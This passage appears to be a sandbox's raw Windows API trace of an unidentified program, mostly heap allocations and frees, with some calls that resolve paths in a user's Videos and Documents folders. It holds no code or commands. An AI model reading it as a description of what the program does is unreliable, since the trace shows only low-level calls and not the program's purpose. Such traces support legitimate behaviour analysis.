hHeap=0x2af0000) returned 1 [0214.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0214.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0214.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0214.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0214.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0214.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0214.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0214.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5a) returned 0x2a74bf0 [0214.997] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/X3KII9Ky2zq5leE1M.mkv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\X3KII9Ky2zq5leE1M.mkv", lpFilePart=0x8cf650*="X3KII9Ky2zq5leE1M.mkv") returned 0x2c [0214.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74bf0 | out: hHeap=0x2af0000) returned 1 [0214.997] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\X3KII9Ky2zq5leE1M.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\x3kii9ky2zq5lee1m.mkv")) returned 0xffffffff [0214.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74f30 | out: hHeap=0x2af0000) returned 1 [0214.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0214.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0214.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0214.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0214.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.997] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0214.997] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0214.997] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0214.997] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0214.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0214.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0214.997] CharUpperBuffW (in: lpsz="A5700E02918", cchLength=0xb | out: lpsz="A5700E02918") returned 0xb [0214.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0214.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0214.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0214.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0214.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0214.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0214.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0214.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0214.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0214.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0214.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0214.998] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaeb8 [0214.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae58 [0214.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0214.998] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf2b8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0214.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0214.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0214.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0214.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0214.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0214.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0214.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0214.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0214.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0214.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0214.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0214.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b28 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0214.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0214.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0214.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0215.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0215.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0215.000] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0215.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0215.000] CharUpperBuffW (in: lpsz="SSA5700E02918", cchLength=0xd | out: lpsz="SSA5700E02918") returned 0xd [0215.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0215.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0215.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0215.001] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0215.001] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0215.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0215.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0215.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0215.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0215.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0215.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0215.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0215.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0215.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0215.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0215.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0215.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0215.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0215.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0215.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0215.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0215.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.003] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0215.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0215.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0215.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0215.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0215.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0215.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0215.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0215.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0215.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0215.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0215.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9) returned 0x2aab2a8 [0215.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2aab2a8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0215.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5fae0 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab320 [0215.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Documents", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1a) returned 0x2a77ad0 [0215.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Documents", cchWideChar=26, lpMultiByteStr=0x2a77ad0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Documents", lpUsedDefaultChar=0x0) returned 26 [0215.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0215.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x34) returned 0x2a5e6c0 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0215.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0215.004] 